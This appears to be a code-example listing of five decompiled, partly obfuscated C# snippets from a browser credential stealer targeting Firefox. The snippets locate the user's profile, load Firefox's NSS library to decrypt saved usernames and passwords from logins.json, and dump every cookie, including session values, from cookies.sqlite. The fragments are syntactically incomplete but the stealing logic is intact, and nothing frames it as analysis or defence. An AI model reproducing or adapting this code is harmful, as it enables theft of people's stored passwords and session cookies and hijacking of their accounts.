Example #1
        // Token: 0x06000459 RID: 1113 RVA: 0x000100F8 File Offset: 0x0000E2F8
        public static List <GClass32> GetSavedPasswords()
            List <GClass32> list = new List <GClass32>();

                Firefox.InitializeDelegates(Firefox.firefoxProfilePath, Firefox.firefoxPath);
                Firefox.JsonFFData jsonFFData = new Firefox.JsonFFData();
                using (StreamReader streamReader = new StreamReader(Firefox.firefoxLoginFile.FullName))
                    string json = streamReader.ReadToEnd();
                    jsonFFData = GClass31.smethod_1 <Firefox.JsonFFData>(json);
                foreach (Firefox.Login login in jsonFFData.logins)
                    string username = Firefox.Decrypt(login.encryptedUsername);
                    string password = Firefox.Decrypt(login.encryptedPassword);
                    Uri    uri      = new Uri(login.formSubmitURL);
                    list.Add(new GClass32
                        URL         = uri.AbsoluteUri,
                        Username    = username,
                        Password    = password,
                        Application = "Firefox"
            catch (Exception)
Example #2
 // Token: 0x06000458 RID: 1112 RVA: 0x00010050 File Offset: 0x0000E250
 static Firefox()
         Firefox.firefoxPath = Firefox.GetFirefoxInstallPath();
         if (Firefox.firefoxPath == null)
             throw new NullReferenceException("Firefox is not installed, or the install path could not be located");
         Firefox.firefoxProfilePath = Firefox.GetProfilePath();
         if (Firefox.firefoxProfilePath == null)
             throw new NullReferenceException("Firefox does not have any profiles, has it ever been launched?");
         Firefox.firefoxLoginFile = Firefox.GetFile(Firefox.firefoxProfilePath, "logins.json");
         if (Firefox.firefoxLoginFile == null)
             throw new NullReferenceException("Firefox does not have any logins.json file");
         Firefox.firefoxCookieFile = Firefox.GetFile(Firefox.firefoxProfilePath, "cookies.sqlite");
         if (Firefox.firefoxCookieFile == null)
             throw new NullReferenceException("Firefox does not have any cookie file");
     catch (Exception)
Example #3
        // Token: 0x06000466 RID: 1126 RVA: 0x000107AC File Offset: 0x0000E9AC
        private static string Decrypt(string cypherText)
            StringBuilder stringBuilder = new StringBuilder(cypherText);
            int           value         = Firefox.NSSBase64_DecodeBuffer(IntPtr.Zero, IntPtr.Zero, stringBuilder, stringBuilder.Length);

            Firefox.TSECItem tsecitem  = default(Firefox.TSECItem);
            Firefox.TSECItem tsecitem2 = (Firefox.TSECItem)Marshal.PtrToStructure(new IntPtr(value), typeof(Firefox.TSECItem));
            if (Firefox.PK11SDR_Decrypt(ref tsecitem2, ref tsecitem, 0) == 0 && tsecitem.SECItemLen != 0)
                byte[] array = new byte[tsecitem.SECItemLen];
                Marshal.Copy(new IntPtr(tsecitem.SECItemData), array, 0, tsecitem.SECItemLen);
Example #4
        // Token: 0x0600045A RID: 1114 RVA: 0x00010210 File Offset: 0x0000E410
        public static List <FirefoxCookie> GetSavedCookies()
            List <FirefoxCookie> list   = new List <FirefoxCookie>();
            GClass33             gclass = new GClass33(Firefox.firefoxCookieFile.FullName);

            if (!gclass.method_9("moz_cookies"))
                throw new Exception("Could not read cookie table");
            int num = gclass.method_2();

            for (int i = 0; i < num; i++)
                    string   host       = gclass.method_5(i, "host");
                    string   name       = gclass.method_5(i, "name");
                    string   value      = gclass.method_5(i, "value");
                    string   path       = gclass.method_5(i, "path");
                    bool     secure     = !(gclass.method_5(i, "isSecure") == "0");
                    bool     httpOnly   = !(gclass.method_5(i, "isSecure") == "0");
                    long     num2       = long.Parse(gclass.method_5(i, "expiry"));
                    long     num3       = Firefox.ToUnixTime(DateTime.Now);
                    DateTime expiresUTC = Firefox.FromUnixTime(num2);
                    bool     expired    = num3 > num2;
                    list.Add(new FirefoxCookie
                        Host       = host,
                        ExpiresUTC = expiresUTC,
                        Expired    = expired,
                        Name       = name,
                        Value      = value,
                        Path       = path,
                        Secure     = secure,
                        HttpOnly   = httpOnly
                catch (Exception)
Example #5
        // Token: 0x0600045B RID: 1115 RVA: 0x0001037C File Offset: 0x0000E57C
        private static void InitializeDelegates(DirectoryInfo firefoxProfilePath, DirectoryInfo firefoxPath)
            if (new Version(FileVersionInfo.GetVersionInfo(firefoxPath.FullName + "\\firefox.exe").FileVersion).Major < new Version("35.0.0").Major)
            GClass26.LoadLibrary(firefoxPath.FullName + "\\msvcr100.dll");
            GClass26.LoadLibrary(firefoxPath.FullName + "\\msvcp100.dll");
            GClass26.LoadLibrary(firefoxPath.FullName + "\\msvcr120.dll");
            GClass26.LoadLibrary(firefoxPath.FullName + "\\msvcp120.dll");
            GClass26.LoadLibrary(firefoxPath.FullName + "\\mozglue.dll");
            Firefox.nssModule = GClass26.LoadLibrary(firefoxPath.FullName + "\\nss3.dll");
            IntPtr procAddress = GClass26.GetProcAddress(Firefox.nssModule, "NSS_Init");

            Firefox.NSS_InitPtr nss_InitPtr = (Firefox.NSS_InitPtr)Marshal.GetDelegateForFunctionPointer(procAddress, typeof(Firefox.NSS_InitPtr));
            long slot = Firefox.PK11_GetInternalKeySlot();

            Firefox.PK11_Authenticate(slot, true, 0L);